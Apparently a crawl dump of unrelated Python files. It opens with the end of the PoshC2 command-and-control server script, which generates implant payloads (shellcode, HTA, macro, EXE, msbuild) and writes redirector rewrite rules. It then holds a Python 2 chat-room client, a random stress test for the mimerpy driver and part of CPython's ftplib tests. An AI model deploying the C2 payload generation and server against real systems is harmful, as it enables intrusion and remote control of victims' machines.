open("%swebserver.log" % ROOTDIR, "a").write("[-] Error with SharpSocks - is SharpSocks running %s%s\r\n%s\r\n" % (SocksHost, UriPath, traceback.format_exc()))
open("%swebserver.log" % ROOTDIR, "a").write("[-] SharpSocks %s\r\n" % e)
print(Colours.RED + "Error with SharpSocks or old implant connection - is SharpSocks running" + Colours.END)
print(Colours.RED + UriPath + Colours.END)
s.send_response(404)
s.send_header("Content-type", "text/html")
s.end_headers()
s.wfile.write(bytes(HTTPResponse, "utf-8"))
else:
s.send_response(200)
s.send_header("Content-type", "text/html")
s.end_headers()
s.wfile.write(default_response())
except Exception as e:
print(Colours.RED + "Generic error in POST request!" + Colours.END)
print(Colours.RED + UriPath + Colours.END)
print(e)
traceback.print_exc()
ThreadingMixIn.daemon_threads = True
class ThreadedHTTPServer(ThreadingMixIn, HTTPServer):
"""Handle requests in a separate thread."""
def log_c2_messages():
while True:
messages = get_c2_messages()
if messages is not None:
for message in messages:
print(message)
time.sleep(2)
if __name__ == '__main__':
httpd = ThreadedHTTPServer((HOST_NAME, PORT_NUMBER), MyHandler)
try:
if os.name == 'nt':
os.system('cls')
else:
os.system('clear')
except Exception:
print("cls")
print(chr(27) + "[2J")
print(Colours.GREEN + logopic)
print(Colours.END + "")
if os.path.isfile(Database):
print("Using existing database / project" + Colours.GREEN)
C2 = get_c2server_all()
if ((C2[1] == HostnameIP) and (C2[3] == DomainFrontHeader)):
qstart = "%squickstart.txt" % (ROOTDIR)
if os.path.exists(qstart):
with open(qstart, 'r') as f:
print(f.read())
else:
print("Error different IP so regenerating payloads")
if os.path.exists("%spayloads_old" % ROOTDIR):
import shutil
shutil.rmtree("%spayloads_old" % ROOTDIR)
os.rename("%spayloads" % ROOTDIR, "%spayloads_old" % ROOTDIR)
os.makedirs("%spayloads" % ROOTDIR)
C2 = get_c2server_all()
newPayload = Payloads(C2[5], C2[2], HostnameIP, DomainFrontHeader, C2[8], C2[12],
C2[13], C2[11], "", "", C2[19], C2[20], C2[21], get_newimplanturl(), PayloadsDirectory)
new_urldetails("updated_host", HostnameIP, C2[3], "", "", "", "")
update_item("HostnameIP", "C2Server", HostnameIP)
update_item("QuickCommand", "C2Server", QuickCommand)
update_item("DomainFrontHeader", "C2Server", DomainFrontHeader)
newPayload.CreateRaw()
newPayload.CreateDlls()
newPayload.CreateShellcode()
newPayload.CreateSCT()
newPayload.CreateHTA()
newPayload.CreateCS()
newPayload.CreateMacro()
newPayload.CreateEXE()
newPayload.CreateMsbuild()
newPayload.CreatePython()
newPayload.WriteQuickstart(ROOTDIR + 'quickstart.txt')
else:
print("Initializing new project folder and database" + Colours.GREEN)
print("")
directory = os.path.dirname(ROOTDIR)
if not os.path.exists(directory):
os.makedirs(directory)
os.makedirs("%s/downloads" % directory)
os.makedirs("%s/reports" % directory)
os.makedirs("%s/payloads" % directory)
initializedb()
if not validate_sleep_time(DefaultSleep):
print(Colours.RED)
print("Invalid DefaultSleep in config, please specify a time such as 50s, 10m or 1h")
print(Colours.GREEN)
sys.exit(1)
setupserver(HostnameIP, gen_key().decode("utf-8"), DomainFrontHeader, DefaultSleep, KillDate, HTTPResponse, ROOTDIR, ServerPort, QuickCommand, DownloadURI, "", "", "", Sounds, APIKEY, MobileNumber, URLS, SocksURLS, Insecure, UserAgent, Referrer, APIToken, APIUser, EnableNotifications)
rewriteFile = "%s/rewrite-rules.txt" % directory
print("Creating Rewrite Rules in: " + rewriteFile)
print("")
rewriteHeader = ["RewriteEngine On", "SSLProxyEngine On", "SSLProxyCheckPeerCN Off", "SSLProxyVerify none", "SSLProxyCheckPeerName off", "SSLProxyCheckPeerExpire off", "# Change IPs to point at C2 infrastructure below", "Define PoshC2 10.0.0.1", "Define SharpSocks 10.0.0.1"]
rewriteFileContents = rewriteHeader + urlConfig.fetchRewriteRules() + urlConfig.fetchSocksRewriteRules()
with open(rewriteFile, 'w') as outFile:
for line in rewriteFileContents:
outFile.write(line)
outFile.write('\n')
outFile.close()
C2 = get_c2server_all()
newPayload = Payloads(C2[5], C2[2], C2[1], C2[3], C2[8], C2[12],
C2[13], C2[11], "", "", C2[19], C2[20],
C2[21], get_newimplanturl(), PayloadsDirectory)
new_urldetails("default", C2[1], C2[3], "", "", "", "")
newPayload.CreateRaw()
newPayload.CreateDlls()
newPayload.CreateShellcode()
newPayload.CreateSCT()
newPayload.CreateHTA()
newPayload.CreateCS()
newPayload.CreateMacro()
newPayload.CreateEXE()
newPayload.CreateMsbuild()
create_self_signed_cert(ROOTDIR)
newPayload.CreatePython()
newPayload.WriteQuickstart(directory + '/quickstart.txt')
print("")
print("CONNECT URL: " + select_item("HostnameIP", "C2Server") + get_newimplanturl() + Colours.GREEN)
print("WEBSERVER Log: %swebserver.log" % ROOTDIR)
KEY = get_baseenckey()
print("")
print(time.asctime() + " PoshC2 Server Started - %s:%s" % (HOST_NAME, PORT_NUMBER))
from datetime import date, datetime
killdate = datetime.strptime(C2[5], '%d/%m/%Y').date()
datedifference = number_of_days(date.today(), killdate)
if datedifference < 8:
print (Colours.RED+("\nKill Date is - %s - expires in %s days" % (C2[5],datedifference)))
else:
print (Colours.GREEN+("\nKill Date is - %s - expires in %s days" % (C2[5],datedifference)))
print(Colours.END)
if (os.path.isfile("%sposh.crt" % ROOTDIR)) and (os.path.isfile("%sposh.key" % ROOTDIR)):
try:
httpd.socket = ssl.wrap_socket(httpd.socket, keyfile="%sposh.key" % ROOTDIR, certfile="%sposh.crt" % ROOTDIR, server_side=True, ssl_version=ssl.PROTOCOL_TLS)
except Exception:
httpd.socket = ssl.wrap_socket(httpd.socket, keyfile="%sposh.key" % ROOTDIR, certfile="%sposh.crt" % ROOTDIR, server_side=True, ssl_version=ssl.PROTOCOL_TLSv1)
else:
raise ValueError("Cannot find the certificate files")
c2_message_thread = threading.Thread(target=log_c2_messages, daemon=True)
c2_message_thread.start()
try:
httpd.serve_forever()
except (KeyboardInterrupt, EOFError):
httpd.server_close()
print(time.asctime() + " PoshC2 Server Stopped - %s:%s" % (HOST_NAME, PORT_NUMBER))
sys.exit(0)
|
ChatRoom1.0Client.py
|
#!/usr/bin/env python
# -.- coding: utf-8 -.-y
import socket
import os
import time
import threading
import Queue
import sys
import argparse
from multiprocessing import Process
print """\33[91m
═════════════════════════════════════════════════════════
███████ ██████ ███████
█ █ █ █ ║
█ █════╗ █ ╔═█ ║
█═════════════█ ╚█ ║█═══╝
█ ██████ ║█
█ █ █ ╚╗█ ╔═══════Server
█════════╗ █ █ ╚═█ ║
███████ ║ █ █ ███████
Chat Room Client════════╝
═════════════════════════════════════════════════════════
\33[92m"""
quit = Queue.Queue()
path = os.path.realpath(__file__)
parser = argparse.ArgumentParser()
parser.add_argument("-s", "--screen", help="This is used by the script to make a screen. Not necessarily needed for regular users.")
args = parser.parse_args()
def outputscreen(messages, online):
rows, columns = os.popen('stty size', 'r').read().split()
rows = int(rows)
rows = rows - 1
columns = int(columns)
if len(messages) > rows:
messages = messages[len(messages) - rows:]
print messages
else:
pass
if len(online) > rows:
online = online[len(online) - rows:]
print online
else:
pass
output = []
for line in range(rows):
output.append(["", ""])
tick = 0
for message in messages:
output[tick][0] = message
tick = tick + 1
print tick
if len(output) <= len(online):
print "less or equal output then online"
for l in range(len(online) - len(output)):
output.append(["", ""])
print output
#for num in range(len(online)):
tick = 0
print output
for user in online:
output[tick][1] = user
tick = tick + 1
print output
else:
print "more output then online"
print rows
#for num in range(len(output)):
tick = 0
for user in online:
output[tick][1] = user
tick = tick + 1
for line in output:
space = int(columns)
outleng = len(line[0]) + len(line[1])
space = space - outleng
print line[0] + " "*space + line[1]
if args.screen:
sp = args.screen
sp = sp.split(":")
user = sp[2]
port = int(sp[1])
server = sp[0]
global cv
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
server_address = (server, port)
sock.connect(server_address)
sock.send("screen:")
#print "\33[96m Type /stop to quit\33[91m"
quit = False
messages = []
import ast
online = sock.recv(1024)
online = ast.literal_eval(online)
tmp = online
while quit == False:
servercom = sock.recv(1024)
#print servercom
if servercom == "quitting:":
quit.put("1")
quit = True
os._exit(0)
elif "online:" in servercom:
online = ast.literal_eval(servercom[7:])
if tmp != online:
for line in tmp:
if line not in online:
messages.append(line + " has left the server...")
else:
pass
for line in online:
if line not in tmp:
messages.append(line + " has joined the server...")
else:
pass
else:
pass
if user not in online:
quit = True
sock.send("quitting:")
os._exit(0)
else:
sock.send("good:")
tmp = online
outputscreen(messages, online)
else:
messages.append(servercom)
outputscreen(messages, online)
time.sleep(.01)
if servercom == "ping":
sock.send("ping:pong")
else:
pass
else:
pass
cv = "1.0"
username = raw_input("Name:")
server = raw_input("Server IP[127.0.0.1]:")
port = raw_input("Server Port[22550]:")
if port == "":
port = "22550"
else:
pass
if server == "":
server = "127.0.0.1"
else:
pass
print port
class connect(object):
def __init__(self, server, port, username, quit):
self.quit = quit
self.server = server
self.port = port
self.username = username
self.con()
def con(self):
#try:
global cv
self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
server_address = (self.server, int(self.port))
self.sock.connect(server_address)
self.sock.settimeout(60)
self.sock.send("cv:" + cv)
compatible = self.sock.recv(1024)
if compatible == "comp:1":
pass
else:
print """\33[91m
***************************************************
Error Server is on version """ + compatible[7:] + """
***************************************************
"""
sys.exit()
self.sock.send("user:" + self.username)
nc = self.sock.recv(1024)
if "error:" in nc:
print """\33[91m
***************************************************
Error while sending username:
""" + nc[6:] + """
***************************************************
"""
os._exit(0)
threading.Thread(target = self.ping, args=()).start()
threading.Thread(target = self.screen, args=()).start()
#self.screen.start()
quit = False
while quit == False:
inp = raw_input(">>")
if inp == "/quit":
quit = True
self.quit.put("1")
self.sock.send("quitting:")
elif "" == inp:
"""\33[91m
***************************************************
Error no message entered
***************************************************
"""
elif "/help" == inp:
"""\33[91m
***************************************************
Error no help menu implemented yet
***************************************************
"""
else:
self.sock.send("mesg:" + inp)
else:
os._exit(0)
'''except:
print """\33[91m
***************************************************
Error while initiating connecting with server
***************************************************
"""
sys.exit()'''
def ping(self):
while True:
self.sock.send("ping:")
time.sleep(1)
def screen(self):
global path
os.system("xterm -e python " + "./ChatRoom1.0Client.py" + " -s " + self.server + ":" + self.port + ":" + self.username)
self.qt = True
self.quit.put("1")
def quitcheck(quit):
while True:
time.sleep(1)
if quit.empty() == True:
pass
else:
os._exit(0)
threading.Thread(target = quitcheck, args=(quit,)).start()
threading.Thread(target=connect, args=(server, port, username, quit)).start()
|
testMonkey.py
|
# Copyright (c) 2017 Mimer Information Technology
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
#
# See license for more details.
import unittest
import time
import math
import mimerpy
import random
import uuid
import threading
from mimerpy.mimPyExceptions import *
import db_config
class TestMonkey(unittest.TestCase):
@classmethod
def setUpClass(self):
(self.syscon, self.tstcon) = db_config.setup()
@classmethod
def tearDownClass(self):
db_config.teardown(tstcon=self.tstcon, syscon=self.syscon)
def setUp(self):
self.tstcon.rollback()
with self.tstcon.cursor() as c:
c.execute("""
create table monkeyTable (c1 INTEGER,
c2 BIGINT,
c3 SMALLINT,
c4 NVARCHAR(256),
c5 BLOB,
c6 NCLOB,
c7 BOOLEAN,
c8 FLOAT) in pybank""")
self.tstcon.commit()
def tearDown(self):
self.tstcon.rollback()
with self.tstcon.cursor() as c:
c.execute("drop table monkeyTable")
self.tstcon.commit()
########################################################################
## Tests below
########################################################################
def test_cursor_dml(self):
cur = self.tstcon.cursor()
for nu in range(0,2000):
apa = random.randint(0,10)
if (apa == 0):
self.cursor_select(cur)
elif (apa == 1):
self.cursor_select_and_fetchone(cur)
elif (apa == 2):
self.cursor_select_and_fetchmany(cur, nu)
elif (apa == 3):
self.cursor_select_and_fetchall(cur)
elif (apa == 4):
self.cursor_insert_executemany(cur)
elif (apa == 5):
self.cursor_insert(cur)
elif (apa == 6):
self.cursor_insert_many(cur)
elif (apa == 7):
try:
self.cursor_next(cur)
except StopIteration:
"""Caught exception"""
elif (apa == 8):
self.cursor_commit(self.tstcon)
elif (apa == 9):
self.cursor_rollback(self.tstcon)
elif (apa == 10):
self.cursor_description_all(cur)
cur.close()
def test_cursor_ddl_and_dml(self):
cur = self.tstcon.cursor()
for nu in range(0,1000):
apa = random.randint(0,15)
if (apa == 0):
try:
self.cursor_select(cur)
except Exception:
""" Ok """
elif (apa == 1):
try:
self.cursor_select_and_fetchone(cur)
except Exception:
""" Ok """
elif (apa == 2):
try:
self.cursor_select_and_fetchmany(cur, nu)
except Exception:
""" Ok """
elif (apa == 3):
try:
self.cursor_select_and_fetchall(cur)
except Exception:
""" Ok """
elif (apa == 4):
try:
self.cursor_insert_executemany(cur)
except Exception:
""" Ok """
elif (apa == 5):
try:
self.cursor_insert(cur)
except Exception:
""" Ok """
elif (apa == 6):
try:
self.cursor_insert_many(cur)
except Exception:
""" Ok """
elif (apa == 7):
try:
self.cursor_next(cur)
except Exception:
"""Caught exception"""
elif (apa == 8):
try:
self.cursor_update(cur)
except Exception:
""" Ok """
elif (apa == 9):
try:
self.monkey_insert(cur)
except Exception:
""" Ok """
elif (apa == 11):
try:
self.monkey_select_and_fetchone(cur)
except Exception:
""" Ok """
elif (apa == 12):
try:
self.cursor_delete(cur)
except Exception:
""" Ok """
elif (apa == 13):
try:
self.cursor_commit(self.tstcon)
except Exception:
""" Ok """
elif (apa == 14):
try:
self.cursor_rollback(self.tstcon)
except Exception:
""" Ok """
elif (apa == 15):
try:
self.cursor_description_all(cur)
except Exception:
""" Ok """
cur.close()
def test_condis(self):
def condis(self):
mylist = []
for ac in range(5):
con = mimerpy.connect(**db_config.TSTUSR)
mylist.append([con, True])
for a in range(100):
rand = random.randint(0,4)
if (not mylist[rand][1]):
mylist.pop(rand)
conn = mimerpy.connect(**db_config.TSTUSR)
mylist.append([conn, True])
else:
mylist[rand][0].close()
mylist[rand][1] = False
for ab in mylist:
if (ab[1]):
ab[0].close()
for i in range(9):
t = threading.Thread(target = condis, args = (self,))
t.start()
while (threading.active_count() > 1):
time.sleep(1)
########################################################################
## No Tests below
## Support routines follow
########################################################################
def cursor_insert(self, cur):
a = random.randint(-2**31, 2**31 - 1)
b = random.randint(-2**63, 2**63 - 1)
c = random.randint(-2**15, 2**15 - 1)
d = str(uuid.uuid4())
e = uuid.uuid4().bytes
f = str(uuid.uuid4())
g = random.randint(0,1)
h = random.random()
cur.execute("insert into monkeyTable values (?,?,?,?,?,?,?,?)",[(a),(b),(c),(d),(e),(f),(g),(h)])
def monkey_insert(self, cur):
a = random.randint(-2**100,2**100)
d = str(uuid.uuid4() * random.randint(0,1000))
g = random.randint(0,1)
h = random.random() / 3
cur.execute("insert into monkeyTable values (?,?,?,?,?,?,?,?)",[(a),(a),(a),(d),(d),(d),(d),(h)])
def cursor_select(self, cur):
cul = random.randint(1,8)
a = "c" + str(cul)
query = "select " + a + " from monkeyTable"
cur.execute(query)
def monkey_select(self, cur):
cul = random.randint(0,10)
a = "c" + str(cul)
query = "select " + a + " from monkeyTable"
cur.execute(query)
def cursor_select_and_fetchone(self, cur):
cul = random.randint(1,8)
a = "c" + str(cul)
query = "select " + a + " from monkeyTable"
cur.execute(query)
cur.fetchone()
def monkey_select_and_fetchone(self, cur):
cul = random.randint(1,8)
a = "c" + str(cul)
query = "select " + a + " from monkeyTable"
cur.execute(query)
laps = random.randint(0,100)
for a in laps:
cur.fetchone()
def cursor_select_and_fetchmany(self, cur, numboflaps):
cul = random.randint(1,8)
a = "c" + str(cul)
query = "select " + a + " from monkeyTable"
cur.execute(query)
up = random.randint(0,numboflaps)
cur.fetchmany(up)
def cursor_select_and_fetchall(self, cur):
cul = random.randint(1,8)
a = "c" + str(cul)
query = "select " + a + " from monkeyTable"
cur.execute(query)
cur.fetchall()
def cursor_insert_executemany(self, cur):
monkeylist = []
for m in range(0,10):
a = random.randint(-2**31, 2**31 - 1)
b = random.randint(-2**63, 2**63 - 1)
c = random.randint(-2**15, 2**15 - 1)
d = str(uuid.uuid4())
e = uuid.uuid4().bytes
f = str(uuid.uuid4())
g = random.randint(0,1)
h = random.random()
monkeylist.append((a,b,c,d,e,f,g,h))
#print("monkeylist ", monkeylist)
cur.executemany("insert into monkeyTable values (?,?,?,?,?,?,?,?)", monkeylist)
def cursor_insert_many(self, cur):
a = random.randint(-2**31, 2**31 - 1)
b = random.randint(-2**63, 2**63 - 1)
c = random.randint(-2**15, 2**15 - 1)
d = str(uuid.uuid4())
e = uuid.uuid4().bytes
f = str(uuid.uuid4())
g = random.randint(0,1)
h = random.random()
for a in range(0,10):
cur.execute("insert into monkeyTable values (?,?,?,?,?,?,?,?)", ((a),(b),(c),(d),(e),(f),(g),(h)))
def cursor_next(self, cur):
cul = random.randint(1,8)
a = "c" + str(cul)
query = "select " + a + " from monkeyTable"
cur.execute(query)
cur.next()
def cursor_update(self, cur):
a = random.randint(-2**31, 2**31 - 1)
cur.execute("update monkeyTable set where c1 = ? where c1 < ?", (a, a))
def cursor_delete(self, cur):
a = random.randint(-2**31, 2**31 - 1)
cur.execute("delete from monkeyTable where c1 = ? where c1 < ?", (a, a))
def cursor_next_StopIteration(self, cur):
cul = random.randint(1,8)
cur.execute("DELETE from monkeyTable")
try:
cur.next()
except StopIteration:
"""Caught Exception"""
def cursor_commit(self, conn):
conn.commit()
def cursor_rollback(self, conn):
conn.rollback()
def cursor_description_all(self,cur):
cul = random.randint(1,8)
cur.execute("select * from monkeyTable")
self.assertEqual(cur.description,(('c1', 50, None, None, None, None, None),
('c2', 52, None, None, None, None, None),
('c3', 48, None, None, None, None, None),
('c4', 63, None, None, None, None, None),
('c5', 57, None, None, None, None, None),
('c6', 59, None, None, None, None, None),
('c7', 42, None, None, None, None, None),
('c8', 56, None, None, None, None, None),))
if __name__ == '__main__':
unittest.TestLoader.sortTestMethodsUsing = None
unittest.main()
|
test_ftplib.py
|
"""Test script for ftplib module."""
# Modified by Giampaolo Rodola' to test FTP class, IPv6 and TLS
# environment
import ftplib
import asyncore
import asynchat
import socket
import io
import errno
import os
import time
try:
import ssl
except ImportError:
ssl = None
from unittest import TestCase
from test import support
from test.support import HOST
threading = support.import_module('threading')
# the dummy data returned by server over the data channel when
# RETR, LIST and NLST commands are issued
RETR_DATA = 'abcde12345\r\n' * 1000
LIST_DATA = 'foo\r\nbar\r\n'
NLST_DATA = 'foo\r\nbar\r\n'
class DummyDTPHandler(asynchat.async_chat):
dtp_conn_closed = False
def __init__(self, conn, baseclass):
asynchat.async_chat.__init__(self, conn)
self.baseclass = baseclass
self.baseclass.last_received_data = ''
def handle_read(self):
self.baseclass.last_received_data += self.recv(1024).decode('ascii')
def handle_close(self):
# XXX: this method can be called many times in a row for a single
# connection, including in clear-text (non-TLS) mode.
# (behaviour witnessed with test_data_connection)
if not self.dtp_conn_closed:
self.baseclass.push('226 transfer complete')
self.close()
self.dtp_conn_closed = True
def push(self, what):
super(DummyDTPHandler, self).push(what.encode('ascii'))
def handle_error(self):
raise
class DummyFTPHandler(asynchat.async_chat):
dtp_handler = DummyDTPHandler
def __init__(self, conn):
asynchat.async_chat.__init__(self, conn)
self.set_terminator(b"\r\n")
self.in_buffer = []
self.dtp = None
self.last_received_cmd = None
self.last_received_data = ''
self.next_response = ''
self.rest = None
self.push('220 welcome')
def collect_incoming_data(self, data):
self.in_buffer.append(data)
def found_terminator(self):
line = b''.join(self.in_buffer).decode('ascii')
self.in_buffer = []
if self.next_response:
self.push(self.next_response)
self.next_response = ''
cmd = line.split(' ')[0].lower()
self.last_received_cmd = cmd
space = line.find(' ')
if space != -1:
arg = line[space + 1:]
else:
arg = ""
if hasattr(self, 'cmd_' + cmd):
method = getattr(self, 'cmd_' + cmd)
method(arg)
else:
self.push('550 command "%s" not understood.' %cmd)
def handle_error(self):
raise
def push(self, data):
asynchat.async_chat.push(self, data.encode('ascii') + b'\r\n')
def cmd_port(self, arg):
addr = list(map(int, arg.split(',')))
ip = '%d.%d.%d.%d' %tuple(addr[:4])
port = (addr[4] * 256) + addr[5]
s = socket.create_connection((ip, port), timeout=10)
self.dtp = self.dtp_handler(s, baseclass=self)
self.push('200 active data connection established')
def cmd_pasv(self, arg):
with socket.socket() as sock:
sock.bind((self.socket.getsockname()[0], 0))
sock.listen(5)
sock.settimeout(10)
ip, port = sock.getsockname()[:2]
ip = ip.replace('.', ','); p1 = port / 256; p2 = port % 256
self.push('227 entering passive mode (%s,%d,%d)' %(ip, p1, p2))
conn, addr = sock.accept()
self.dtp = self.dtp_handler(conn, baseclass=self)
def cmd_eprt(self, arg):
af, ip, port = arg.split(arg[0])[1:-1]
port = int(port)
s = socket.create_connection((ip, port), timeout=10)
self.dtp = self.dtp_handler(s, baseclass=self)
self.push('200 active data connection established')
def cmd_epsv(self, arg):
with socket.socket(socket.AF_INET6) as sock:
sock.bind((self.socket.getsockname()[0], 0))
sock.listen(5)
sock.settimeout(10)
port = sock.getsockname()[1]
self.push('229 entering extended passive mode (|||%d|)' %port)
conn, addr = sock.accept()
self.dtp = self.dtp_handler(conn, baseclass=self)
def cmd_echo(self, arg):
# sends back the received string (used by the test suite)
self.push(arg)
def cmd_noop(self, arg):
self.push('200 noop ok')
def cmd_user(self, arg):
self.push('331 username ok')
def cmd_pass(self, arg):
self.push('230 password ok')
def cmd_acct(self, arg):
self.push('230 acct ok')
def cmd_rnfr(self, arg):
self.push('350 rnfr ok')
def cmd_rnto(self, arg):
self.push('250 rnto ok')
def cmd_dele(self, arg):
self.push('250 dele ok')
def cmd_cwd(self, arg):
self.push('250 cwd ok')
def cmd_size(self, arg):
self.push('250 1000')
def cmd_mkd(self, arg):
self.push('257 "%s"' %arg)
def cmd_rmd(self, arg):
self.push('250 rmd ok')
def cmd_pwd(self, arg):
self.push('257 "pwd ok"')
def cmd_type(self, arg):
self.push('200 type ok')
def cmd_quit(self, arg):
self.push('221 quit ok')
self.close()
def cmd_stor(self, arg):
self.push('125 stor ok')
def cmd_rest(self, arg):
self.rest = arg
self.push('350 rest ok')
def cmd_retr(self, arg):
self.push('125 retr ok')
if self.rest is not None:
offset = int(self.rest)
else:
offset = 0
self.dtp.push(RETR_DATA[offset:])
self.dtp.close_when_done()
self.rest = None
def cmd_list(self, arg):
self.push('125 list ok')
self.dtp.push(LIST_DATA)
self.dtp.close_when_done()
def cmd_nlst(self, arg):
self.push('125 nlst ok')
self.dtp.push(NLST_DATA)
self.dtp.close_when_done()
class DummyFTPServer(asyncore.dispatcher, threading.Thread):
handler = DummyFTPHandler
def __init__(self, address, af=socket.AF_INET):
threading.Thread.__init__(self)
asyncore.dispatcher.__init__(self)
self.create_socket(af, socket.SOCK_STREAM)
self.bind(address)
self.listen(5)
self.active = False
self.active_lock = threading.Lock()
self.host, self.port = self.socket.getsockname()[:2]
self.handler_instance = None
def start(self):
assert not self.active
self.__flag = threading.Event()
threading.Thread.start(self)
self.__flag.wait()
def run(self):
self.active = True
self.__flag.set()
while self.active and asyncore.socket_map:
self.active_lock.acquire()
asyncore.loop(timeout=0.1, count=1)
self.active_lock.release()
asyncore.close_all(ignore_all=True)
def stop(self):
assert self.active
self.active = False
self.join()
def handle_accepted(self, conn, addr):
self.handler_instance = self.handler(conn)
def handle_connect(self):
self.close()
handle_read = handle_connect
def writable(self):
return 0
def handle_error(self):
raise
if ssl is not None:
CERTFILE = os.path.join(os.path.dirname(__file__), "keycert.pem")
class SSLConnection(asyncore.dispatcher):
"""An asyncore.dispatcher subclass supporting TLS/SSL."""
_ssl_accepting = False
_ssl_closing = False
def secure_connection(self):
self.del_channel()
socket = ssl.wrap_socket(self.socket, suppress_ragged_eofs=False,
certfile=CERTFILE, server_side=True,
do_handshake_on_connect=False,
ssl_version=ssl.PROTOCOL_SSLv23)
self.set_socket(socket)
self._ssl_accepting = True
def _do_ssl_handshake(self):
try:
self.socket.do_handshake()
except ssl.SSLError as err:
if err.args[0] in (ssl.SSL_ERROR_WANT_READ,
ssl.SSL_ERROR_WANT_WRITE):
return
elif err.args[0] == ssl.SSL_ERROR_EOF:
return self.handle_close()
raise
except socket.error as err:
if err.args[0] == errno.ECONNABORTED:
return self.handle_close()
else:
self._ssl_accepting = False
def _do_ssl_shutdown(self):
self._ssl_closing = True
try:
self.socket = self.socket.unwrap()
except ssl.SSLError as err:
if err.args[0] in (ssl.SSL_ERROR_WANT_READ,
ssl.SSL_ERROR_WANT_WRITE):
return
except socket.error as err:
# Any "socket error" corresponds to a SSL_ERROR_SYSCALL return
# from OpenSSL's SSL_shutdown(), corresponding to a
# closed socket condition. See also:
# http://www.mail-archive.com/openssl-users@openssl.org/msg60710.html
pass
self._ssl_closing = False
super(SSLConnection, self).close()
def handle_read_event(self):
if self._ssl_accepting:
self._do_ssl_handshake()
elif self._ssl_closing:
self._do_ssl_shutdown()
else:
super(SSLConnection, self).handle_read_event()
def handle_write_event(self):
if self._ssl_accepting:
self._do_ssl_handshake()
elif self._ssl_closing:
self._do_ssl_shutdown()
else:
super(SSLConnection, self).handle_write_event()
def send(self, data):
try:
return super(SSLConnection, self).send(data)
except ssl.SSLError as err:
if err.args[0] in (ssl.SSL_ERROR_EOF, ssl.SSL_ERROR_ZERO_RETURN,
ssl.SSL_ERROR_WANT_READ,
ssl.SSL_ERROR_WANT_WRITE):
return 0
raise
def recv(self, buffer_size):
try:
return super(SSLConnection, self).recv(buffer_size)
except ssl.SSLError as err:
if err.args[0] in (ssl.SSL_ERROR_WANT_READ,
ssl.SSL_ERROR_WANT_WRITE):
return b''
if err.args[0] in (ssl.SSL_ERROR_EOF, ssl.SSL_ERROR_ZERO_RETURN):
self.handle_close()
return b''
raise
def handle_error(self):
raise
def close(self):
if (isinstance(self.socket, ssl.SSLSocket) and
self.socket._sslobj is not None):
self._do_ssl_shutdown()
else:
super(SSLConnection, self).close()
class DummyTLS_DTPHandler(SSLConnection, DummyDTPHandler):
"""A DummyDTPHandler subclass supporting TLS/SSL."""
def __init__(self, conn, baseclass):
DummyDTPHandler.__init__(self, conn, baseclass)
if self.baseclass.secure_data_channel:
self.secure_connection()
class DummyTLS_FTPHandler(SSLConnection, DummyFTPHandler):
"""A DummyFTPHandler subclass supporting TLS/SSL."""
dtp_handler = DummyTLS_DTPHandler
def __init__(self, conn):
DummyFTPHandler.__init__(self, conn)
self.secure_data_channel = False
def cmd_auth(self, line):
"""Set up secure control channel."""
self.push('234 AUTH TLS successful')
self.secure_connection()
def cmd_pbsz(self, line):
"""Negotiate size of buffer for secure data transfer.
For TLS/SSL the only valid value for the parameter is '0'.
Any other value is accepted but ignored.
"""
self.push('200 PBSZ=0 successful.')
def cmd_prot(self, line):
"""Setup un/secure data channel."""
arg = line.upper()
if arg == 'C':
self.push('200 Protection set to Clear')
self.secure_data_channel = False
elif arg == 'P':
self.push('200 Protection set to Private')
self.secure_data_channel = True
else:
self.push("502 Unrecognized PROT type (use C or P).")
class DummyTLS_FTPServer(DummyFTPServer):
handler = DummyTLS_FTPHandler
class TestFTPClass(TestCase):
def setUp(self):
self.server = DummyFTPServer((HOST, 0))
self.server.start()
self.client = ftplib.FTP(timeout=10)
self.client.connect(self.server.host, self.server.port)
def tearDown(self):
self.client.close()
self.server.stop()
def test_getwelcome(self):
self.assertEqual(self.client.getwelcome(), '220 welcome')
def test_sanitize(self):
self.assertEqual(self.client.sanitize('foo'), repr('foo'))
self.assertEqual(self.client.sanitize('pass 12345'), repr('pass *****'))
self.assertEqual(self.client.sanitize('PASS 12345'), repr('PASS *****'))
def test_exceptions(self):
self.assertRaises(ftplib.error_temp, self.client.sendcmd, 'echo 400')
self.assertRaises(ftplib.error_temp, self.client.sendcmd, 'echo 499')
self.assertRaises(ftplib.error_perm, self.client.sendcmd, 'echo 500')
self.assertRaises(ftplib.error_perm, self.client.sendcmd, 'echo 599')
self.assertRaises(ftplib.error_proto, self.client.sendcmd, 'echo 999')
def test_all_errors(self):
exceptions = (ftplib.error_reply, ftplib.error_temp, ftplib.error_perm,
ftplib.error_proto, ftplib.Error, IOError, EOFError)
for x in exceptions:
try:
raise x('exception not included in all_errors set')
except ftplib.all_errors:
pass
def test_set_pasv(self):
# passive mode is supposed to be enabled by default
self.assertTrue(self.client.passiveserver)
self.client.set_pasv(True)
self.assertTrue(self.client.passiveserver)
self.client.set_pasv(False)
self.assertFalse(self.client.passiveserver)
def test_voidcmd(self):
self.client.voidcmd('echo 200')
self.client.voidcmd('echo 299')
self.assertRaises(ftplib.error_reply, self.client.voidcmd, 'echo 199')
self.assertRaises(ftplib.error_reply, self.client.voidcmd, 'echo 300')
def test_login(self):
self.client.login()
def test_acct(self):
self.client.acct('passwd')
def test_rename(self):
self.client.rename('a', 'b')
self.server.handler_instance.next_response = '200'
self.assertRaises(ftplib.error_reply, self.client.rename, 'a', 'b')
def test_delete(self):
self.client.delete('foo')
self.server.handler_instance.next_response = '199'
